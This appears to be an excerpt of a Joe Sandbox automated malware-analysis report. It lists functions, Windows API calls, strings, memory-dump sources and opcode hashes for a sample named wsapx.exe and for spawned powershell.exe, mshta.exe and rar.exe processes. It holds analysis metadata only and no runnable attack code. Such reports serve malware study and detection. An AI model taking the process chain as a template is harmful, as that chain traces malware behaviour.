Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo
String ID: ?
API String ID: 1286766494-1684325040
Opcode ID: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction ID: 2a4553ba099a8aec5c5db6e110ca966514bc3a210b5364d9cf161b10ffb011ff
Opcode Fuzzy Hash: 8108d8be77440c3e9c62f2a415d3a3f63afd5a4d850aaf976d1496cecaf540be
Instruction Fuzzy Hash: 7B412B12A1868147F722AF65B481379E664EBE0FF4F944235EE5C06AD5DE3CD442CB20

Function 00007FF7C71C9084 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71C90B6

Part of subcall function 00007FF7C71CA9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9CE
Part of subcall function 00007FF7C71CA9B8: GetLastError.KERNEL32(?,?,?,00007FF7C71D2D92,?,?,?,00007FF7C71D2DCF,?,?,00000000,00007FF7C71D3295,?,?,?,00007FF7C71D31C7), ref: 00007FF7C71CA9D8

GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF7C71BCC15), ref: 00007FF7C71C90D4

Strings

C:\Users\user\Desktop\wsapx.exe, xrefs: 00007FF7C71C90C2

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
String ID: C:\Users\user\Desktop\wsapx.exe
API String ID: 3580290477-3302721598
Opcode ID: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction ID: 17458fd6defc6d2548aebf330592781d0acd47de8e01809fc26c857e4711c2b0
Opcode Fuzzy Hash: 2cf9991d5cc0f55d4af5251d222b056ff2fa25707e1fd1ed9fb4097698885552
Instruction Fuzzy Hash: CB414031A0865287E715FF65B8810BDA794EB84FE4BD54035EA4E43B85DE3CE4938360

Function 00007FFD9479F6F0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 102COMMON

Download Yara Rule

APIs

00007FFDAC0619C0.VCRUNTIME140 ref: 00007FFD9479F7CE

Strings

sqlite_returning, xrefs: 00007FFD9479F807
cannot use RETURNING in a trigger, xrefs: 00007FFD9479F717

Memory Dump Source

Source File: 00000002.00000002.2669354495.00007FFD94741000.00000040.00000001.01000000.0000000D.sdmp, Offset: 00007FFD94740000, based on PE: true

Associated: 00000002.00000002.2669319396.00007FFD94740000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD94899000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD9489B000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669354495.00007FFD948B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669587652.00007FFD948B2000.00000080.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000002.00000002.2669627059.00007FFD948B4000.00000004.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffd94740000_wsapx.jbxd

Similarity

API ID: 00007C0619
String ID: cannot use RETURNING in a trigger$sqlite_returning
API String ID: 3344901894-753984552
Opcode ID: 4d71a1ed1be8154145d31cb5655592c581e01f5ea5807a174fc836d0f382942a
Instruction ID: 3015117afa24c8f2734104e29be6e27039b4d1da0ca5b669c04129db08871bd3
Opcode Fuzzy Hash: 4d71a1ed1be8154145d31cb5655592c581e01f5ea5807a174fc836d0f382942a
Instruction Fuzzy Hash: 66416F32B09B89D6E6789B61E5A03B973A4FB4AB84F448431DB9D07796CF3CE461C341

Function 00007FF7C71CCCA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32 ref: 00007FF7C71CCDBF
GetLastError.KERNEL32 ref: 00007FF7C71CCDE1

Strings

U, xrefs: 00007FF7C71CCD6B

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ErrorFileLastWrite
String ID: U
API String ID: 442123175-4171548499
Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction ID: a2e211a56e73fee2a883212f16d36f7c676aa409a19189427c2e43a6ffa515af
Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
Instruction Fuzzy Hash: 6F41A772B18A4586DB209F65F4443B9A761FBD4BA4F844035EE4D87B98DF3CD502CB50

Function 00007FF7C71CF628 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32 ref: 00007FF7C71CF668
GetCurrentDirectoryW.KERNEL32 ref: 00007FF7C71CF6BA

Strings

:, xrefs: 00007FF7C71CF67E

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction ID: 5fb5493a09cc253c9a3302ad274e7611088f32cc27f6fc463b717bc04ae42c2e
Opcode Fuzzy Hash: 779a21297323b81187f7e0c7d27b40be9ec8fbab2d126766b2de98969da868de
Instruction Fuzzy Hash: 1421CE63A0829183EB20AF55E04426DB3B5FBC8F94FD58035DA8D43694DF7CEA46CB61

Function 00007FF7C71BFDB8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

RtlPcToFileHeader.KERNEL32 ref: 00007FF7C71BFE08
RaiseException.KERNEL32 ref: 00007FF7C71BFE49

Strings

csm, xrefs: 00007FF7C71BFE36

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: ExceptionFileHeaderRaise
String ID: csm
API String ID: 2573137834-1018135373
Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction ID: 999e80c2de1e550b40157e95cc51e93f567e9002ce35832dfb1a1cba2b8f026e
Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
Instruction Fuzzy Hash: 92112B32618B8183EB619F15F440269B7E4FB88F94F994234DE8D07B69EF3CD5528B00

Function 00007FF7C71D07AC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7C71D07DC
GetDriveTypeW.KERNEL32 ref: 00007FF7C71D081C

Strings

:, xrefs: 00007FF7C71D0805

Memory Dump Source

Source File: 00000002.00000002.2666480121.00007FF7C71B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7C71B0000, based on PE: true

Associated: 00000002.00000002.2666443864.00007FF7C71B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666528648.00007FF7C71DB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71EE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666567403.00007FF7C71F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2666637851.00007FF7C71F4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff7c71b0000_wsapx.jbxd

Similarity

API ID: DriveType_invalid_parameter_noinfo
String ID: :
API String ID: 2595371189-336475711
Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction ID: ba3a1ff7511b0b4414d425eb6ff46139613af58c264950ad48d73016b97ccb97
Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
Instruction Fuzzy Hash: 1701882291C20787F721BF50B4A627EA7A0EFD4B64FC00035D55D46695DF2CD5068E34

Analysis Process: powershell.exePID: 7664, Parent PID: 7516COMMON

Executed Functions

Function 00007FFD3243BCDA Relevance: 1.6, Strings: 1, Instructions: 359COMMON

Download Yara Rule

Strings

SS_H, xrefs: 00007FFD3243BEF0

Memory Dump Source

Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd

Similarity

API ID:
String ID: SS_H
API String ID: 0-3542247296
Opcode ID: 09e3544c4e688e313a493238ddf6318a2d699d85fc8c792385510c0989b97efa
Instruction ID: 90185696e68ed56cd9d67a4ffcfa3a650f6bb0a83b821f955dd4f214c66b123f
Opcode Fuzzy Hash: 09e3544c4e688e313a493238ddf6318a2d699d85fc8c792385510c0989b97efa
Instruction Fuzzy Hash: B6B16D71F0CA894FE756DB2CC8656F57BE0EF62321B0841BED289C7193DA65B812C741

Function 00007FFD325067F5 Relevance: .4, Instructions: 436COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2314826374.00007FFD32500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32500000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e2a87484646cf0a4bea0cc933a23ac221a328035287cafbeb90ebfbb23247c3
Instruction ID: a8c85f74e6151a1263b9d99e5dfbcc2659bbe3215a6b5a3aa54db1432c857f5a
Opcode Fuzzy Hash: 2e2a87484646cf0a4bea0cc933a23ac221a328035287cafbeb90ebfbb23247c3
Instruction Fuzzy Hash: DBD16432E0EACA4FEBAAAF6848745B97BE0EF45311B1841BFD14DCB0D7D958A905C341

Function 00007FFD3243A0D3 Relevance: .3, Instructions: 329COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 203f0c506975134a246f9853447ceb452d8a51024001ab3c00718c56bf4435db
Instruction ID: 939a6006c3258be46f7fc4ffe1ef2ef27e0ba39a78a78c7a6b365bd8ae8b0458
Opcode Fuzzy Hash: 203f0c506975134a246f9853447ceb452d8a51024001ab3c00718c56bf4435db
Instruction Fuzzy Hash: B341E376A4D7D94FD3039BA8ACB51D47FB0EF2222570D01F7C688CB193E948185A8792

Function 00007FFD3243A240 Relevance: .2, Instructions: 219COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e07b4f0fa22054868f85888095ac67f31241bc4bd5f86cf204523bee55603b12
Instruction ID: 396211fe8cb4df9df5df76a0d317ee687a5c744a96ad7f7063f0c062985ac0e9
Opcode Fuzzy Hash: e07b4f0fa22054868f85888095ac67f31241bc4bd5f86cf204523bee55603b12
Instruction Fuzzy Hash: 56F02734908ACC8FCB45DF2888296E53FF0FF25311F05019BE90CCB122D6609A68CBC2

Function 00007FFD324397D3 Relevance: .2, Instructions: 207COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 430730c108bf12d203b88bf3e59fb2f1e7017e956508e56a28f28cc546e4a7af
Instruction ID: 3e6bcc0e3720888a3f63a960bc977fea4540d9e585abdb7ff449b09ce8f67825
Opcode Fuzzy Hash: 430730c108bf12d203b88bf3e59fb2f1e7017e956508e56a28f28cc546e4a7af
Instruction Fuzzy Hash: 9A513A32E0CB884FD7199B2C98655E9BFE0EF55311F04027FD198D3193DA64B916C792

Function 00007FFD324333B5 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction ID: a5afd92068d187e9aa175b2cbf18bc0b8fde32836c7094354f3d6655c8f8a7be
Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
Instruction Fuzzy Hash: 7D01677121CB0C4FD744EF0CE451AA5B7E0FB95364F10056DE58AC3665DA36E892CB45

Function 00007FFD3250432D Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2314826374.00007FFD32500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32500000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62e573bcf852be9fd556ffb6a5badc512741bc1e8067ce31c55283abe3362577
Instruction ID: a0905d2450d90a780223f80743988047e1532d9661acee7af308f7398b355fec
Opcode Fuzzy Hash: 62e573bcf852be9fd556ffb6a5badc512741bc1e8067ce31c55283abe3362577
Instruction Fuzzy Hash: C9F09A32B0C6198FD769EB4CA8518E873E0EF48322B1140BAE15DC71A7CA26EC80C741

Function 00007FFD3231EDDF Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2302284686.00007FFD3231D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3231D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd3231d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d56f4bddb564cff3ae0eaed41149a3ffe2d2b29172fa5166b543b54159a42f63
Instruction ID: cc374bc5f12585db6f491fc36f7f5197fcb69c2e6b1c19856b0508ba406cc8e1
Opcode Fuzzy Hash: d56f4bddb564cff3ae0eaed41149a3ffe2d2b29172fa5166b543b54159a42f63
Instruction Fuzzy Hash: 7CF0B730A19E099F8AA4FF2DC485E1237E1FB983107110699E45EC7265D674F892CB90

Function 00007FFD325045E0 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2314826374.00007FFD32500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32500000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3dbb6f14ec7668c8865d2f6a82b1f764d0daf3d20d8c1b6200733748134977e
Instruction ID: 79bf774f9902994c0ed3362d3a3e207a1e5e2908f885e54b6ca4b79e617e5c07
Opcode Fuzzy Hash: b3dbb6f14ec7668c8865d2f6a82b1f764d0daf3d20d8c1b6200733748134977e
Instruction Fuzzy Hash: 95F08232B0D5588FDB69EF8CE4618A877E0EF05322B1940F6E15DC75A7DA26EC40C740

Non-executed Functions

Function 00007FFD3243851B Relevance: 6.3, Strings: 5, Instructions: 94COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD3243852A
N_^, xrefs: 00007FFD3243850A
N_^, xrefs: 00007FFD3243857A
N_^, xrefs: 00007FFD324385C9
N_^, xrefs: 00007FFD3243856A

Memory Dump Source

Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^$N_^
API String ID: 0-2528851458
Opcode ID: edc0f0332c0a4c9c4809b1521de1fedd39ceafb9b70ffa2b826d80cc95a2d80e
Instruction ID: 50f7372a23229a18c4bdd572cb1f38a1d2a8b69aef2ad2d4d430d2e67c2118e3
Opcode Fuzzy Hash: edc0f0332c0a4c9c4809b1521de1fedd39ceafb9b70ffa2b826d80cc95a2d80e
Instruction Fuzzy Hash: 993182A3F4E6C25FE3470A381C7A1956FA0AE7322930A05F7D2D447193E9989517A712

Function 00007FFD324386FA Relevance: 5.1, Strings: 4, Instructions: 79COMMON

Download Yara Rule

Strings

N_^, xrefs: 00007FFD32438772
N_^, xrefs: 00007FFD32438762
N_^, xrefs: 00007FFD32438722
N_^, xrefs: 00007FFD32438712

Memory Dump Source

Source File: 0000000B.00000002.2310099043.00007FFD32430000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32430000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_7ffd32430000_powershell.jbxd

Similarity

API ID:
String ID: N_^$N_^$N_^$N_^
API String ID: 0-3900292545
Opcode ID: 6cbfd1f429746320f776e946eaa5b5f28f899a3a198cf9823f69531337fc78bf
Instruction ID: a52185f9f057a6390841492bea3d73f8547745a41956d81968c42a91ad5fc1f2
Opcode Fuzzy Hash: 6cbfd1f429746320f776e946eaa5b5f28f899a3a198cf9823f69531337fc78bf
Instruction Fuzzy Hash: E72182A3F4E6D95FE35317286CB51A57F90AF3221970B05F3C7D48B093EE98150B9602

Analysis Process: mshta.exePID: 7720, Parent PID: 7532COMMON

Executed Functions

Function 000001DAE0CF0FC1 Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000003.2237057383.000001DAE0CF0000.00000010.00000800.00020000.00000000.sdmp, Offset: 000001DAE0CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_3_1dae0cf0000_mshta.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction ID: 6b94b894d1473b98992fae58ca04c7a3cdce75f1bc8d78c9adf7e3c9135d397e
Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
Instruction Fuzzy Hash: 649002144D641655D42451E10C4539C518067C8654FE44481441690184D44D0296A157

Analysis Process: powershell.exePID: 5328, Parent PID: 7416COMMON

Executed Functions

Function 00007FFD325117DE Relevance: .8, Instructions: 752COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000041.00000002.2514457888.00007FFD32510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_65_2_7ffd32510000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 909b04333549f87ccd7b6145c84a4fb4ed14ee794aed78d41a0261d60059fe7f
Instruction ID: 7d27eabd24b6d00e137d91fa070e75e7804aacca4d0866b128f4da1c4ab007ed
Opcode Fuzzy Hash: 909b04333549f87ccd7b6145c84a4fb4ed14ee794aed78d41a0261d60059fe7f
Instruction Fuzzy Hash: 3E223622F0DB890FEBA79B2858661B57BE1EF86621B0841FFD08DC71D3D958AD05C352

Function 00007FFD32444DD3 Relevance: .2, Instructions: 221COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000041.00000002.2513470596.00007FFD32440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_65_2_7ffd32440000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7227f891e7a88c6223b1cc47f8c0f4f303f64cf7dafa5d8de71ecf3781b340dc
Instruction ID: d5bfa29d6f5c4cf027176388519d602fceb2792bd9915b7ef713245ef2d35b13
Opcode Fuzzy Hash: 7227f891e7a88c6223b1cc47f8c0f4f303f64cf7dafa5d8de71ecf3781b340dc
Instruction Fuzzy Hash: C161D471E09A4C8FEB55DB6CD8952ADBBF1EF5A321F1441BED049D7292CA35AC02CB40

Function 00007FFD325117FC Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000041.00000002.2514457888.00007FFD32510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_65_2_7ffd32510000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c60f662be82a175446699a46e68793c6fd1ad92d4e24a891b189b7f57a59a96d
Instruction ID: f80333e6e24b76f7ec75f58242359729843cc38a7891d3e884b354634aa5e6e1
Opcode Fuzzy Hash: c60f662be82a175446699a46e68793c6fd1ad92d4e24a891b189b7f57a59a96d
Instruction Fuzzy Hash: 17411622F0DB8A0FEB575A2844A22753BE1EF85622F4980FAC18CC7193DD69BD05D341

Function 00007FFD32443945 Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000041.00000002.2513470596.00007FFD32440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_65_2_7ffd32440000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction ID: ecf9f99ad612b16494824efce393f4b3b0a94e2b8a50ff6ea57562968c3e47c6
Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
Instruction Fuzzy Hash: 4C01677121CB0C4FD744EF0CE451AA5B7E0FB95364F50056DE58AC3665D636E882CB45

Non-executed Functions

Function 00007FFD32445D80 Relevance: 5.0, Strings: 4, Instructions: 38COMMON

Download Yara Rule

Strings

Hfl2, xrefs: 00007FFD32445DB1
(fl2, xrefs: 00007FFD32445D91
8fl2, xrefs: 00007FFD32445DA1
Xfl2, xrefs: 00007FFD32445DC1

Memory Dump Source

Source File: 00000041.00000002.2513470596.00007FFD32440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD32440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_65_2_7ffd32440000_powershell.jbxd

Similarity

API ID:
String ID: (fl2$8fl2$Hfl2$Xfl2
API String ID: 0-2722109906
Opcode ID: 7b361d8553f9c6dd6034931411c39caf0d85189f749d399f3826f8c6901e9fdd
Instruction ID: b2e9c0ef39808269ffffa8e69f3a9cb40fee9a32d126a9ce92ad1a6bf8cd185e
Opcode Fuzzy Hash: 7b361d8553f9c6dd6034931411c39caf0d85189f749d399f3826f8c6901e9fdd
Instruction Fuzzy Hash: 5BF0B483F0F8C507EB511B1C3E580796B51EFA122262643FBD0C44218F4C86AC0A8245

Analysis Process: rar.exePID: 2196, Parent PID: 8140COMMON

Execution Graph

Execution Coverage:	7.9%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0.5%
Total number of Nodes:	1216
Total number of Limit Nodes:	38

Executed Functions

Function 00007FF60E5D54C0 Relevance: 36.3, APIs: 4, Strings: 16, Instructions: 1336COMMON

Download Yara Rule

Strings

stdin, xrefs: 00007FF60E5D672D
rar.log, xrefs: 00007FF60E5D5CE5
+, xrefs: 00007FF60E5D6535
VER, xrefs: 00007FF60E5D5EBA
NUL, xrefs: 00007FF60E5D5DB3
EML, xrefs: 00007FF60E5D5D6B
LOG, xrefs: 00007FF60E5D5CD0
default.sfx, xrefs: 00007FF60E5D60F4
SND, xrefs: 00007FF60E5D5D11
ERR, xrefs: 00007FF60E5D5D40
OFF, xrefs: 00007FF60E5D5E4B
7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx, xrefs: 00007FF60E5D5935
*?., xrefs: 00007FF60E5D598C
SFX, xrefs: 00007FF60E5D60CC
*.%ls, xrefs: 00007FF60E5D59AF
stdin, xrefs: 00007FF60E5D6236

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID:
String ID: *.%ls$*?.$+$7z;ace;arj;bz2;cab;gz;jpeg;jpg;lha;lz;lzh;mp3;rar;taz;tgz;xz;z;zip;zipx$EML$ERR$LOG$NUL$OFF$SFX$SND$VER$default.sfx$rar.log$stdin$stdin
API String ID: 0-1628410872
Opcode ID: b9d6aeb0518eca3664f40ad1619fad4736c7e1389d4ca9ce6415b1a8c264bdf8
